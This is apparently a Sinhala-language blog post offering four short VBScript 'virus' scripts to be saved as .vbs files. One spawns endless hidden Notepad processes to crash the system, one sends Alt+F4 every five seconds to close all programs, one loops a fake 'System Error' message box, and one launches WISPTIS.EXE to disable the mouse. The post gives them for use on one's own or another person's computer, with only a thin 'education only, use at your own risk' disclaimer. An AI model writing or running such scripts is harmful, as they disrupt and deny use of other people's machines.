ගොඩක් අයනම් මේවා දන්නවා ඇති මේක දන්නේ නැති අයට දාපු පොස්ට් එකක්
පටන් ගන්න කලින් ඔන්න කියලමයි පටන් ගන්නේ මේකෙන් තමාගේ පරිගණකයට හෝ අන් අයෙකුගේ පරිගණකයට වෙන කිසිම හානියකට මම වගකියන්නේ නැ
.Use at your own risk.තවද අධ්‍යාපනය සදහා පමණක් භාවිතා කරන ලෙස ඉතාමත් කරුණාවෙන් ඉල්ලනවා.
මෙම codes සියල්ලම notepad තුල type කර .vbs extensions එකෙන් save කලයුතු වේ.
(1) Crash System
මේක තම හදන්න පුළුවන් සරලම virus එක.මේ virus එක මගහරවා ගැනීමට දැන් නම් අලුත් windows updates වලට පුළුවන්.කමක් නැ කරලා බලන්නකෝ.
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
මේක notepad වල ට්ය්පේ කරලා .vbs extensions එකෙන් තම save කරන්න ඕනේ.
මේකෙදි වෙන්නේ loop එක ඇතුලේ hidden mod එකෙන් notepad අසීමිත ප්‍රමාණයක් open වෙලා system crash එකක් ඇතිවෙන එක.
(2) close all apps in 5sec.
set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop
මේකෙදි තත්පර 5කින් සියලුම apps close වෙනවා.
(3) Display a fake message box
do
msgbox "System Error : 423"
loop
මේකේ තියන message එක වෙනුවට කැමති එකක් type කරන්න පුළුවන්.සිංහලෙන් message එකක් type කරනවා නම් unicode දීල save කරන්න.
(4) Disable The Mouse
set ws=Createobject("wscript.shell")
for i=1 to 4
ws.run "WISPTIS.EXE",0
next
කියන්න දෙයක් නැනේ mouse එක disable වෙනවා.
තව බලන්න ඕනේ නම් මෙන්න site එක - http://pcusershub.blogspot.com/2015/07/vbscript-virus-programming-par1.html